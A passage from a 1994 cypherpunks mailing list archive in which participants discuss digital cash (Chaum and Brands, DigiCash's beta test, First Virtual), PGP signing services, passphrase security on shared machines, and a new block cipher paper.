Message-ID: <199412021311.HAA10131@pentagon.io.com>

Wolfgang Roeckelein writes:
>
> Does anybody know how the chaum patents (I think they claimed somewhere
> that they had applied for some) affect Brands system?

Chaum has several patents relating to digital cash, the core one being a patent on the blind signature methods commonly in use. When I last heard an update on the Chaum/Brand saga it was that Brand believed his system avoided Chaum's patents while Chaum "had not yet been convinced that this was so, but it was a possibility."

jim

From grendel at netaxs.com Fri Dec 2 05:28:33 1994
From: grendel at netaxs.com (Michael Handler)
Date: Fri, 2 Dec 94 05:28:33 PST
Subject: GATT and crypto? (Was: Re: using us crypto sw outside usa)
In-Reply-To: <199412021035.FAA11778@bb.hks.net>
Message-ID:

On Fri, 2 Dec 1994 adam.philipp at ties.org wrote:

> >I was wondering what is the legal status for using rsaref outside usa.
> >Is it legal or not?
>
> Depends on whether RSA has a patent in that country... I know of no
> countries besides the U.S.A. that have a patent on RSA. Using exact code may
> also violate copyright...that is a tougher matter to prove...but copyright
> treaties allow some level of international protection...use with care.

Anyone know how GATT would affect this, if passed?
ABC News ran a short blurb a few nights ago about how it contained intellectual property provisions, and that patents would be honored worldwide. (?) What effect would this have on the distribution of PGP, and other software that uses RSAREF?

--
Michael Handler
Philadelphia, PA              Civil Liberty Through Complex Mathematics
s.s.y.g-l-b co-moderator      You're only as elegant as your actions let you be

From rah at shipwright.com Fri Dec 2 05:34:29 1994
From: rah at shipwright.com (Robert Hettinga)
Date: Fri, 2 Dec 94 05:34:29 PST
Subject: Scalability of Ecash System / Article on Internet Cash available.
Message-ID: <199412021333.IAA14380@zork.tiac.net>

Filched from buyinfo, where they've been talking a lot about e$ lately...

>From: brands at cwi.nl
>Original-From: Stefan.Brands at cwi.nl
>Subject: Re: Scalability of Ecash System / Article on Internet Cash available.
>To: www-buyinfo at allegra.att.com
>Date: Thu, 1 Dec 1994 16:12:50 +0100 (MET)
>Cc: hfinney at shell.portal.com
>X-Mailer: ELM [version 2.4 PL23]
>Mime-Version: 1.0
>X-UIDL: 786299434.063
>
>I noticed that the discussion is currently about the e-cash system of
>DigiCash. Some good issues have been raised in the discussion, and I
>would like to comment in detail about my own opinion in these matters.
>As it so happens, I recently wrote an article that addresses in detail
>each of the raised concerns, and for this reason it seemed easiest to
>simply make this article available by ftp. So I did. The paper is
>entitled "Electronic Cash on the Internet," and will appear in the
>Proceedings of the Internet Society 1995 Symposium on Network and
>Distributed System Security, San Diego, California, February 16-17,
>1995. To retrieve it: log in anonymously at ftp.cwi.nl, and go to the
>directory pub/brands. There you will find the paper, in both dvi and
>PostScript format (and Unix-compressed formats).
>The paper contains
>several drawings; if you want to have the complete paper, including
>the pictures, then you *must* retrieve the PostScript version. I made
>a particular effort to explain the concepts behind the system (many of
>which are due to Chaum); see Section 3, it is about five pages with no
>math.
>
> Short abstract of the paper: It is generally realized that the Internet
> will not be able to offer full-fledged electronic marketplace
> capabilities without a suitable electronic mechanism for processing
> payments. The electronic payment mechanism that is presented offers a
> variety of features that are believed to be particularly appealing in
> this respect.
>
> To participate, an Internet user must interface to his computer a
> tamper-resistant device with an ordinary 8-bit microprocessor,
> typically a PCMCIA card, and install some software. Internet service
> providers do not need special hardware. Payments can be made
> completely *off-line*, and are untraceable and unlinkable.
> Multi-party security is guaranteed without parties having to trust
> other parties. Transaction processing speeds are such that even
> modestly equipped computers will be able to meet the performance
> levels required by demanding Internet payment applications. One
> particularly interesting such application is click-and-pay ability
> when travelling World-Wide-Web links.
>
>The presented approach may seem to be less attractive than many other
>proposals, because it requires tamper-resistant hardware for the
>users. In the longer run, though, when the use of e.g. smart cards for
>electronic payments has become commonplace, the advantages in my
>opinion will significantly outweigh this objection.
>What will remain
>are the advantages: click-and-pay ability to make instantaneous
>off-line payments, the ability to cost-effectively serve tens of
>millions of participants, the ability to guarantee one's own privacy,
>multi-party security, support for different currencies, and
>portability of tamper-resistant devices to other payment platforms.
>
>
>Some brief comments on the current discussion:
>
>--- Michael E. Peirce (mepeirce at alf2.tcd.ie) wrote:
> >I've been looking at the Ecash payment system and was wondering about
> >the problem of scalability if it were to become popular.
> >(For anyone who doesn't already know, Ecash is an electronic cash
> >solution, details of which can be found at http://www.digicash.com )
> >It seems to me that, while their bank (bank.digicash.com) will be able
> >to handle the 10,000 odd users in the trial, how would it cope with the
> >possibly thousands of transactions that might take place all over the
> >Internet, every minute, if the system were to become popular?
> >Every transaction requires that the merchant shop, connect to the bank
> >to validate the customers coins, right?
> >With a popular Ecash system, the bank would be swamped, or what if even
> >the link to the bank went down for a few days?
>
> Hal (hfinney at shell.portal.com) wrote:
> >There has to be a single common database which all the banks share in
> >order to detect double spending. Otherwise I could spend the same coin
> >multiple times, going to a different bank each time. Granted, shared
> >databases can work, but if a machine which holds part of the database goes
> >down it will take special engineering to keep things consistent and
> >available.
> >There are two different senses in which we can speak of multiple banks.
> >One is a setup where all the banks share the same type of cash, where
> >they are logically a single bank but distributed to try to get increases
> >in reliability.
> >This has the database consistency and access problems I
> >described above, which modern-day bank systems don't have to the same
> >extent.
>
> I fully agree with these comments. Btw, it is correct that the e-cash
> system of DigiCash is an *on-line* *coin* system. It is interesting to
> take a look at their faq, at
> http://www.digicash.com/ecashinfo/ecash-faq.html, item
> "Does ecash really have to be online?". There it says: "Actually, no. [...]
> We'll add some more functionality in that area as soon as the on-line
> system is completely operational." Furthermore, in item "If I copy my
> money, can I spend it twice," it says: "In an off-line
> situation (future) ..." From these comments of DigiCash, it seems that
> they very well realize the problems associated with on-line verification
> when the system is used on a large scale, and that they hope to implement
> an off-line system in the future. However, a problem with this might be
> the following, as noted by Jim McCoy (mccoy at io.com):
> >[first part]
> >A digital money system can do that, but the current version of Chaum's
> >system does not. The disadvantage of a system that does this
> >self-identification of double-spenders is that it front-loads the cost of
> >the identification protocol into everyone's withdrawals and purchases; they
> >must use a cut-and-choose system during withdrawal to make sure that the
> >coins presented for blinding are in the proper format and must perform an
> >additional protocol negotiation during purchases.
> >[...] The overhead involved in the necessary machinations to make sure
> >that a malicious cheater did not send in bogus coins that mis-identified
> >him increases the transaction cost of such a system significantly. It also
> >increases the transaction cost of purchases by requiring the merchant and
> >purchaser to perform an additional transaction to reveal halves of the
> >identity bits after each purchase.
> >[second part]
> >It is an interesting version of the
> >digital coin protocols, but one that is unlikely to be used in the
> >immediate future due to the increased costs it places upon the system. It
> >is likely that such a system will first appear in smartcard digital cash
> >systems where dedicated hardware can cut down on the increased costs.
>
> The first part is correct, the overhead caused by the cut-and-choose
> withdrawal protocols seems unacceptable. Another problem, which
> certainly should not be forgotten, is that it can hardly be said to be
> sufficient if only traceability of double-spenders after the fact is
> offered. It is clearly desirable that there is prior restraint of
> double-spending, and ideally the traceability after the fact should still
> be present (as a second line of defense). Now, doing off-line cash with
> prior restraint of double-spending, *and* privacy of payments, seems to
> result in extremely inefficient systems when one uses the cut-and-choose
> technique of Chaum/Fiat/Naor (just try it, and you'll see what I mean...).
> Probably these are the main reasons why DigiCash has not implemented an
> off-line system. (Yet a third problem is that it is really cumbersome
> to use a coin system if each coin is several kilo-bytes...)
>
> This is not to say that efficient privacy-protecting off-line cash systems
> with prior restraint of double-spending do not exist. The system that I
> present in my paper mentioned above meets all these criteria. The
> reason for this is that I do *not* use a cut-and-choose withdrawal protocol.
> As those of you who have tried to design off-line systems will
> know, the design in fact consists of two protocols, one for paying and one
> for withdrawal; designing the withdrawal protocol is by far the
> hardest task (which is still an understatement...).
> The
> technique that I use for my withdrawal protocols is a new one, called
> restrictive blinding, and the only one known thus far that can provide
> efficient withdrawal protocols. Curiously enough, most of the withdrawal
> protocols that result from this technique are *not* ordinary blind
> signature protocols as defined in
> literature (because only the signature is blinded---the message is not!).
> The withdrawal protocol in my Internet paper is a blind signature protocol,
> but for instance the withdrawal protocol that I used in my technical
> report (reference 5 in the paper) is not.
>
>-- Hal (hfinney at shell.portal.com) wrote:
> >I wish I could. I have applied several times for the beta test at
> >digicash, starting almost three months ago. Finally I got a reply at the
> >beginning of November saying that I would be hearing from them in a few
> >days. Since then, nothing. I wonder if people are actually being
> >allowed to join the beta trial as are implied by all of these web pages?
> >I would like to see a more honest explanation of the chances of being
> >able to experience ecash than the simple "click here to try it out" you see
> >everywhere.
>
> I had exactly the same experience; I sent in the registration several
> months ago. I'm still waiting for my account, which was announced to me at
> the beginning of this month.
>
>
>Stefan Brands,
>------------------------------------------------------
>CWI, Kruislaan 413, 1098 SJ Amsterdam, The Netherlands
>Tel: +31 20 5924103, e-mail: brands at cwi.nl
>

-----------------
Robert Hettinga (rah at shipwright.com)  "There is no difference between someone
Shipwright Development Corporation       who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                     snakes."
-- Bertrand Russell
(617) 323-7923

From sommerfeld at orchard.medford.ma.us Fri Dec 2 05:47:55 1994
From: sommerfeld at orchard.medford.ma.us (Bill Sommerfeld)
Date: Fri, 2 Dec 94 05:47:55 PST
Subject: FBI INVESTIGATING BLACKNET
In-Reply-To: <199412020516.XAA06790@jpunix.com>
Message-ID: <199412021343.IAA00377@orchard.medford.ma.us>

-----BEGIN PGP SIGNED MESSAGE-----

I also heard that the FBI was investigating Blacknet, and had asked questions of someone quite a bit more reliable than Mr. Detweiler.

Apparently someone didn't `get the joke' when Detweiler spammed the world, called the FBI, and the FBI didn't get it either.

Your Tax Dollars At Work.

(BTW, the recent flamage about encouraging digitally signed messages to cypherpunks prodded me into doing something I had been meaning to do for a while: when I go to send mail in emacs, it prompts me if I want to sign or encrypt the outgoing message. It's a 10 minute hack for anyone who knows emacs lisp, but it's something good which has come out of the flame war...)

- Bill

-----BEGIN PGP SIGNATURE-----
Version: 2.6.1
-----END PGP SIGNATURE-----

From paul at digicash.com Fri Dec 2 06:05:04 1994
From: paul at digicash.com (Paul Dinnissen)
Date: Fri, 2 Dec 94 06:05:04 PST
Subject: Brands excluded from digicash beta
Message-ID: <199412021404.PAA18209@digicash.com>

Hi,

We're sorry to hear any complaints about the handling of any requests for information regarding ecash. As you can understand, we are certainly not planning to create unsatisfied ecash users at the very start of the ecash endeavour. So at least we are happy to hear from you so we can act appropriately.

DigiCash has the ambitious goal to make the ecash client software available on virtually every OS platform and/or system.
Alas, our programmers crew is not that extensive that we're able to release everything at once, we have to resort to a phased release approach. For some insight in the release history of the sundry ecash versions, we refer to our WEB server pages.

With this background we answer your questions and remarks, at the hand of some quotes originating from your mail to DigiCash.

> Hal said:
> > I just figured that I didn't have enough clout for them to bother to
> > respond to me, but today on the www-buyinfo list, Stefan Brands, who
> > many think has the best ecash technology available today, posted that he
> > had had the same experience! Brands himself has still not been given
> > an opportunity to join the beta test. He did not sound very happy about
> > this.

As announced, the ecash-trial starts in phases. Currently we are completing most versions of ecash. We receive quite a lot of good feedback from the first releases. Therefore we decided to change the user-interface to get better software that is easier to use, before confronting the user of the next releases with problems already solved!

We decided first to select testers from our own timezone to facilitate easy voice communication in case of extensive support issues. Contrary to our expectations we encountered relatively few problems, so we can soon release also the beta-test to testers in the remaining time zones.

So as you can see our release policy is not that straightforward and involves a lot of considerations like usability and acceptance. This is one of the main reasons why Mr. S. Brands HAS received his beta-test version Friday the 11th of November, together with all his colleagues at the CWI. They all run Silicon Graphics International OS and before that date this version wasn't finished.

> I was in the same boat-- I sent in several requests, all of which were
> ignored. After Digicash issued a call for prototype shops, I signed
> up. WHAM.
I immediately started getting mail asking when I'd have my > shop ready-- sometimes two or three messages a day. > > Once I got everything up and running, I didn't hear further from them. Sometimes we can react very fast, but alas this is only the case for standard procedures which we did automate. More specific questions and requests *have* to be handled by humans. We think the people who are willing to invest quite some effort in setting up a shop for the beta test, are very important participants in the beta test trail. Therefore it seems *very* unlike to us that we didn't respond to *any* mail or request from you. Not trusting our own memory ( we do receive more than 100 (yes, hundred) mails on ecash *each* day, even Sundays) we dove right in to it and found a trail of DigiCash answers to your mail with the subject: 'Concerns about ecash'. > Since then, an accident on my WWW server has rendered the e-shop > inoperable. I've asked Digicash, in the form of Paul Diniessen, for > help reconstructing the bank records. No go. Sorry we *did* sent you a respons within an hour from your request by my colleague Branko. He is responsible for our bank in the trial. His respons was: -The dbm library used by Linux and FreeBSD are different, so the ecash -databases are also incompatible. If you have a password for getting an -initial balance, you can also use this password for reopening your -account (and keeping your old balance). For the server at fairgate.com -account you can use the password ******** (pw made invisible PD) for this. - -Branko > > Of course, it may well be a matter of incompetence rather than insult, > > but the net result is the same. The more I see of digicash's lack of > > consideration towards their potential customers and important figures like > > Brands the more I question whether they have the potential to succeed. > > The more I deal with Digicash, the better First Virtual looks. 
My > technical preference is for using Brands or Chaum cash; at present, > though, there aren't any shipping Brands servers, and the Digicash > folks don't seem to be able to get all their socks in one bag. We feel somewhat troubled by these comments. We strongly feel that the alleged 'lack of consideration' as unjustified. First we would like to split up your comment in to two different issues, first regarding our potential customers and secondly the issue of Mr. S. Brands. As we mentioned before we deem *all* our users, in the past, now, and in the future, as important whether it concerns "shops" or mere "customers" they all contribute to a successful new payment medium. We like you to consider this phase in the existence of ecash as a genuin beta trail. In beta test not only software is being trailed but the supporting services too! However, it should be noted that we did respond to your mail and requests. On the issue on Mr. S. Brands. As we explained before no way we even considered to exclude Mr. Brands for the beta test. As of the technical appreciation of the Chaum system as opposed to the Brands system and the alleged scalability issues , we propose you contact Mr. S. Brands and Mr. D. Chaum for details. We will give a call today to check if received this mail. We hope to resolve the problems mentioned above and to continue our co-operation. Kindest regards, Paul Dinnissen DigiCash bv. From dmandl at bear.com Fri Dec 2 06:09:31 1994 From: dmandl at bear.com (dmandl at bear.com) Date: Fri, 2 Dec 94 06:09:31 PST Subject: Cypherpunks@hks.net service Message-ID: <9412021408.AA21731@yeti.bsnet> > From: cactus at bb.hks.net > > The cypherpunks at hks.net service is now available. > > It will sign any message sent to cypherpunks at hks.net with its (currently > 384 bit) key and forward the signed message to cypherpunks at toad.com. No offense, but what's the point? What's next, automated key-signing services? 
Is this just intended to help people who can't sign easily to get around Eric's proposed requirement? If so, it seems like almost an embarrassment--someone setting up a meaningless message signer to spoof the cypherpunk server, which it does easily. Doesn't sound too good to me.

--Dave.

From collsc at snowbird.aud.alcatel.com Fri Dec 2 06:17:26 1994
From: collsc at snowbird.aud.alcatel.com (collsc at snowbird.aud.alcatel.com)
Date: Fri, 2 Dec 94 06:17:26 PST
Subject: public accounts / PGP / passphrases
Message-ID: <199412021422.JAA13606@bb.hks.net>

-----BEGIN PGP SIGNED MESSAGE-----

> From owner-cypherpunks at toad.com Thu Dec 1 20:25:31 1994
> Date: Thu, 1 Dec 1994 21:18:55 -0500
> Subject: public accounts / PGP / passphrases
> To: cypherpunks at toad.com
> From: lmccarth at ducie.cs.umass.edu
> X-Server-Version: Cactus-Serv 1.1
> Reply-To: cypherpunks at bb.hks.net
> Sender: owner-cypherpunks at toad.com
> Content-Length: 1705
>

Rather than assume that the "Reply-To:" field shown above is appropriate, I have Cc'ed your originating address as well. So, if you get two copies of this, you'll know why.

>
> Could someone please elaborate on the foolishness of using PGP with a
> passphrase on a public machine (as I do) ? Am I wrong in thinking that my
> secret key is useless to an intruder until she guesses my passphrase ? I
> have no net access except via an account on a public machine, so I'm not
> about to start storing my secret key elsewhere, but I'll change my passphrase
> to if it's irrelevant anyway. I just reviewed the PGP docs a bit and
> Phil says "Nobody can use your secret key file without this pass phrase.",
> which seems to contradict what many people on the list have said.
>

Postulate an unscrupulous sysadmin (or anyone who manages to get the password for 'root' via fair means or foul). Let's call him Charlie (since we know that neither Alice nor Bob would do such a thing :). Charlie could easily install a process which logs each keystroke you enter, thus capturing your passphrase in said log. Alternately, he could substitute a rogue version of PGP for the real version. This rogue version would function exactly like the real version (to avoid suspicion on your part), but would surreptitiously copy your secret key and passphrase into a log file.

Admittedly, this kind of attack is far-fetched. As long as you are aware of the possibility, you are free to assess the likelihood of such an attack and proceed accordingly.

- --
Scott Collins             "Now, thanks to the computer revolution, many
Alcatel Network Systems    geeks make ten times as much money as you do."
Richardson, Texas          Canter & Siegel, the Green Card Lawyers

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBFAwUBLt8tgyoZzwIn1bdtAQFxDAF/Vu1A4jQ5R0hW2OODcMMPCjeCFZG0aRvB
OJDeQZi5hBGAVjVk2QOeCZR//zWvp1lC
=Rpnk
-----END PGP SIGNATURE-----

[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.]

From eric at remailer.net Fri Dec 2 07:11:10 1994
From: eric at remailer.net (Eric Hughes)
Date: Fri, 2 Dec 94 07:11:10 PST
Subject: Cypherpunks@hks.net service
In-Reply-To: <9412021408.AA21731@yeti.bsnet>
Message-ID: <199412021609.IAA15568@largo.remailer.net>

   From: dmandl at bear.com

   What's next, automated key-signing services?

Yep.

There are two purposes to signing a key. The first is to fix a bit pattern and have an assurance that it hasn't changed. The second is to attest to the mapping between a key and some entity.

PGP, for example, very explicitly does both. It asks you when you sign a key if you're sure that the person is who is advertised. I consider this behavior broken, not the least because it's hostile to pseudonymity. This hardcoded policy hinders the use of PGP in other contexts.

For email-only social contact (i.e. legally uninvolved) the attestations of personal mapping are unnecessary and sometimes downright undesirable. Some people may want them, true, and there will be a need for that mechanism, but it should not be the only choice available.

An automated key-signing server can affix a sequence of bits perfectly adequately. So can digital timestamping algorithms, but they are not generally available.

Suppose the existence of just two auto-signing servers. I, a pseudonym, send my key to each of these servers and get back two signatures on my key. It is unlikely now that someone can spoof my key.

The distribution for the signing keys of these servers must be done right, but since there are fewer auto-signing servers than things signed, more effort can be taken to do this, for example, by publishing some hashcodes in a book.

Eric

From eric at remailer.net Fri Dec 2 07:19:32 1994
From: eric at remailer.net (Eric Hughes)
Date: Fri, 2 Dec 94 07:19:32 PST
Subject: Brands excluded from digicash beta
In-Reply-To: <199412021404.PAA18209@digicash.com>
Message-ID: <199412021618.IAA15583@largo.remailer.net>

   From: "Paul Dinnissen"

   > The more I deal with Digicash, the better First Virtual looks. My
   > technical preference is for using Brands or Chaum cash; at present,
   > though, there aren't any shipping Brands servers, and the Digicash
   > folks don't seem to be able to get all their socks in one bag.

   We feel somewhat troubled by these comments.

As well you should.

The fact of the matter is that First Virtual currently provides a net benefit by moving real value (e.g. dollars) around, and Digicash does not. Until the Digicash system can move real value, there is no reason to use it.

The technology is irrelevant. _If_ you can move real value, you can provide a benefit. _Only if_ you can move real value can you provide a benefit.
Eric From eric at remailer.net Fri Dec 2 07:22:31 1994 From: eric at remailer.net (Eric Hughes) Date: Fri, 2 Dec 94 07:22:31 PST Subject: Authentication at toad.com: WTF? In-Reply-To: <9412010625.AA17536@anchor.ho.att.com> Message-ID: <199412021621.IAA15589@largo.remailer.net> From: wcs at anchor.ho.att.com (bill.stewart at pleasantonca.ncr.com +1-510-484-6204) Trusting someone else's verification is less than ideal security policy :-) But likewise, preventing folks from letting someone else (their legal agent) perform verification for them is a less than ideal political policy. There are going to be lots of good reasons (mostly of cost) to use agency relationship for security. It would be profitable to characterize the threats and come up with some solutions rather than to deny that these things will happen. Eric From db at Tadpole.COM Fri Dec 2 07:50:23 1994 From: db at Tadpole.COM (Doug Barnes) Date: Fri, 2 Dec 94 07:50:23 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412021404.PAA18209@digicash.com> Message-ID: <9412021548.AA17294@tadpole> A further reply to Mr. Robichaux, who I paraphrase, "The more I have problems with the DigiCash beta, the better First Virutal looks." Some problems with this: 1) It is, after all, a Beta Test. Many companies limit participation in such tests quite arbitrarily. Also, remember, DigiCash (to the best of my knowledge) is not going into the digital bank business itself, but rather through licensees. Aside from Paul, who is very PR oriented, it is primarily a group of quite talented young programmers who are, while answering your letters, trying to come out with new versions of the code. 2) A group of us went over the First Virtual stuff in detail last night over fajitas, and were practically rolling on the floor with laughter. Basically they have an attitude of "Crypto is too hard, people won't want to use it." 
So instead, each transaction consists of an e-mail exchange which is converted ultimately into credit card transactions The exposure time for the merchant is on the order of _90 days_. All fraud, etc., is on the head of the merchant. The bottom line here is that FV has a system which is much more sluggish than the DigiCash system, even though it doesn't use "hard" crypto. It is far from anonymous, and the transactions are trivially reversible. This is actually a _design goal_ in their "Soylent Green", er, "Simple Green" proposed standard. It is completely inappropriate for hard goods of significant value, and its minimum transaction cost is high enough to rule out its applicability for very small transactions. Even if used for purely informational goods, if an undercapitalized info service becomes popular, it will sink beneath the waves while waiting for payment. As near as I can tell, FV's technology was developed by people who wanted to implement their pet philosophy about Internet commerce (customer should examine info first, then commit to paying, all transactions reversible, cryptography and anonymity are bad, secure transactions are not possible on the net, etc.), rather than anything bordering on an Internet cash-like system. So, I ask, First Virtual is looking better and better for doing _what_? Until they deal with the interface problem (get a decent client, rather than relying exclusively on e-mail), I think they're not even going to be adequate for getting shareware-scale proceeds from putting up a cool Web page. From Richard.Johnson at Colorado.EDU Fri Dec 2 07:51:55 1994 From: Richard.Johnson at Colorado.EDU (Richard Johnson) Date: Fri, 2 Dec 94 07:51:55 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412021404.PAA18209@digicash.com> Message-ID: <199412021551.IAA23536@spot.Colorado.EDU> | We're sorry to hear any complaints about the handling of any requests for | information regarding ecash. 
As you can understand, we are certaintly not | planning to create unsatisied ecash users at the very start of the ecash endeavour. But, for the most part out here, we can't tell. I, too, have heard only deafening silence from e-cash folks in response to my multiple queries and requests for more information on their system, let alone joining their beta test. Like Hal Finney, I just assumed I was being ignored because I didn't have enough clout. As a result, I just gave up on e-cash as something I wouldn't find useful any time soon. I do understand the difficulties in dealing with releases on multiple platforms. Still, you might at least acknowledge e-mail from people who want to help make your system work, who want to use it. A form letter at least, explaining that you don't need their help right at the moment but will let them know when a system for their platform is being released for a wider beta test, well, that might be a real good idea. Ignoring people after you've publicly asked for beta testers and said "mail to <...> for further information" is definitely not a good idea. My count: 4 messages over about 6 months asking for more info, no replies. My reaction: Well, it was a nice idea. Maybe I'll check back in a couple of years, when there might actually be someone there. Rich PS - I'm not posting this to two lists because I've seen that's the only way to squeeze a response out of DigiCash, but you can be forgiven for thinking things like that. ;-) -- Loudyellnet: Richard Johnson | Sneakernet: ECNT1-6, CB 429, CU Boulder Phonenet: +1.303.492.0590 | Internet: Richard.Johnson at Colorado.EDU RIPEM and PGP public keys available by server, finger or request Speaker to avalanche dragons. Do you really think they listen? From perry at imsi.com Fri Dec 2 07:52:01 1994 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 2 Dec 94 07:52:01 PST Subject: The thread that would not die. 
(Mandating signatures) In-Reply-To: Message-ID: <9412021551.AA04657@snark.imsi.com> John Schofield says: > It is silly to talk of someone "owning" the list. The list is a > community. The only possible owners are the people in the community. If we > all left, Eric would still have control over the list--but the list would be > worthless. It is silly to talk of someone "owning" a restaurant. The restaurant is a community. The only possible owners are the people in the community. If the patrons all left, Chef Joey would still have control over the restaurant -- but the restaurant would be worthless. From bshantz at spry.com Fri Dec 2 08:19:29 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Fri, 2 Dec 94 08:19:29 PST Subject: Paper available on new cipher Message-ID: <9412021615.AA00764@homer.spry.com> Hooray!!! Kudos to Matt for actually posting something outside of the tiresome "Eric Hughes is a lame-o" thread!!! (Which, by the way, I agree with Tim that it is a sign of health on the list. I would also like to say that I'm not going to post my opinion.) I intend to read and comment accordingly on the MacGuffin document. It's refreshing to see someone coding crypto. -- Brad <---- Begin Included Message ----> Bruce Schneier and I have been designing a block cipher, called "MacGuffin", based on a new variant of the standard Feistel (S-P) network structure. We are presenting a paper describing the cipher, entitled "The MacGuffin Block Cipher Algorithm", at the Leuven crypto algorithms workshop later this month. Here's the abstract: A forthcoming paper will discuss the characteristics GUFN structure in more detail. Comments and analysis greatly appreciated. -matt <---- End Included Message ----> >>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<< Brad Shantz bshantz at spry.com Senior Software Engineer Main #: (206)-447-0300 SPRY Inc. 
Direct #: (206)-442-8251 316 Occidental Ave FAX #: (206)-442-9008 2nd Floor Seattle, WA 98104 WWW URL: http://WWW.SPRY.COM ------------------------------------------------------------- >>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< From werewolf at io.org Fri Dec 2 08:24:31 1994 From: werewolf at io.org (Mark Terka) Date: Fri, 2 Dec 94 08:24:31 PST Subject: First Virtual? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > From: "Paul Dinnissen" > > > The more I deal with Digicash, the better First Virtual looks. My > > technical preference is for using Brands or Chaum cash; at present, > > though, there aren't any shipping Brands servers, and the Digicash > > folks don't seem to be able to get all their socks in one bag. > > We feel somewhat troubled by these comments. > > As well you should. > > The facts of the matter is that First Virtual currently provides a net > benefit by moving real value (e.g. dollars) around, and Digicash does > not. Until the Digicash system can move real value, there is no > reason to use it. Ok, where do we E-Mail First Virtual to get some info to begin trying the concept out? Is there an automatic help file that can be sent or can we access it via ftp or WWW somehow? 
-----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt9F5K+YbMzawbu5AQFo7AQAkzL2TId0Dqhqt8xnOjqgSnp8zXBFHBc0 Up356NwADzE/8/xnQlEMSMUAGjLLvnBE83KT8ko7H7RWc7HDieNxED6gtrmTO+uq HFcXi9hZMUywri4gG9vGWLQDa9bhpc5NEISQtzZCmPnbI4k+NtXnNRLDlPUvgxv8 BX+QK/trLnA= =RAiJ -----END PGP SIGNATURE----- -------------------------------------------------------------------------- Mark Terka | werewolf at io.org | public key (werewolf) by Toronto,Canada | dg507 at cleveland.freenet.edu | public key server or request --------------------------------------------------------------------------- From paul at poboy.b17c.ingr.com Fri Dec 2 08:25:24 1994 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Fri, 2 Dec 94 08:25:24 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412021404.PAA18209@digicash.com> Message-ID: <199412021623.AA18739@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- Paul, I appreciate your reply, especially the information that I can use to reconstruct my account. I never received the mail that Branko originally sent. Evidently no one received my repeated requests sent after the first one. > Sometimes we can react very fast, but alas this is only the case for > standard procedures which we did automate. More specific questions > and requests *have* to be handled by humans. We think the people who are > willing to invest quite some effort in setting up a shop for the beta > test, are very important participants in the beta test trail. > Therefore it seems *very* unlike to us that we didn't respond to *any* > mail or request from you. Not trusting our own memory ( we do receive more > than 100 (yes, hundred) mails on ecash *each* day, even Sundays) > we dove right in to it and found a trail of DigiCash answers to your mail > with the subject: 'Concerns about ecash'. I was unclear in my original statement. 
You, Marcel, and others did respond to my comments and questions-- specifically to my concerns about when ecash systems would be available for real use. My upset came from the fact that once my shop stopped working, I didn't get a response. > > Since then, an accident on my WWW server has rendered the e-shop > > inoperable. I've asked Digicash, in the form of Paul Diniessen, for > > help reconstructing the bank records. No go. > Sorry we *did* sent you a respons within an hour from your > request by my colleague Branko. He is responsible for our bank in > the trial. His respons was: > -The dbm library used by Linux and FreeBSD are different, so the ecash > -databases are also incompatible. If you have a password for getting an > -initial balance, you can also use this password for reopening your > -account (and keeping your old balance). For the server at fairgate.com > -account you can use the password ******** (pw made invisible PD) for this. > - > -Branko > > > Of course, it may well be a matter of incompetence rather than insult, > > > but the net result is the same. The more I see of digicash's lack of > > > consideration towards their potential customers and important figures like > > > Brands the more I question whether they have the potential to succeed. > > > > The more I deal with Digicash, the better First Virtual looks. My > > technical preference is for using Brands or Chaum cash; at present, > > though, there aren't any shipping Brands servers, and the Digicash > > folks don't seem to be able to get all their socks in one bag. > We feel somewhat troubled by these comments. We strongly feel that > the alleged 'lack of consideration' as unjustified. First we would > like to split up your comment in to two different issues, first > regarding our potential customers and secondly the issue of Mr. S. > Brands. First of all, Hal Finney wrote the paragraph which mentions lack of consideration. 
My own feelings toward Digicash-- which you confirm-- are that you have more work to do than you can presently handle. I understand that; it's not uncommon, and I don't hold it against you. It _does_ hamper my ability to set up services for which I can be paid. > We like you to consider this phase in the existence of ecash as a > genuin beta trail. In beta test not only software is being trailed > but the supporting services too! However, it should be noted that we > did respond to your mail and requests. This is a good point. I do understand that this is a beta test, and that problems will occur. I also want to confirm for other readers that you did respond to my mail; in the most important case I didn't get the response. > We will give a call today to check if received this mail. We hope to > resolve the problems mentioned above and to continue our co-operation. Thanks for your detailed response. Regards, - -Paul Robichaux - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt9J/qfb4pLe9tolAQFABwP9FuFZvDeAzVlnFGqg5NwszbAoPN1IbV/2 SpD0bEdxbUkB+OdBCSkYgkcA0O/gU7MWFYNuJr062b8mwCBm5GLG8AGGq6dSYM+A Tfdq/oi1F+yrkDcvq7t6TMfLcgiynylAfVqv1c8+SHrMxXtHDJ5hLlqvfJ43m09S 2nsZTGVd01s= =rwxp -----END PGP SIGNATURE----- From jamesd at netcom.com Fri Dec 2 08:35:31 1994 From: jamesd at netcom.com (James A. Donald) Date: Fri, 2 Dec 94 08:35:31 PST Subject: Brands excluded from digicash beta In-Reply-To: <9412021548.AA17294@tadpole> Message-ID: <199412021635.IAA24295@netcom10.netcom.com> Doug Barnes writes > 1) It is, after all, a Beta Test. Many companies limit > participation in such tests quite arbitrarily. Also, > remember, So send out a form letter: "Thank you for your interest. 
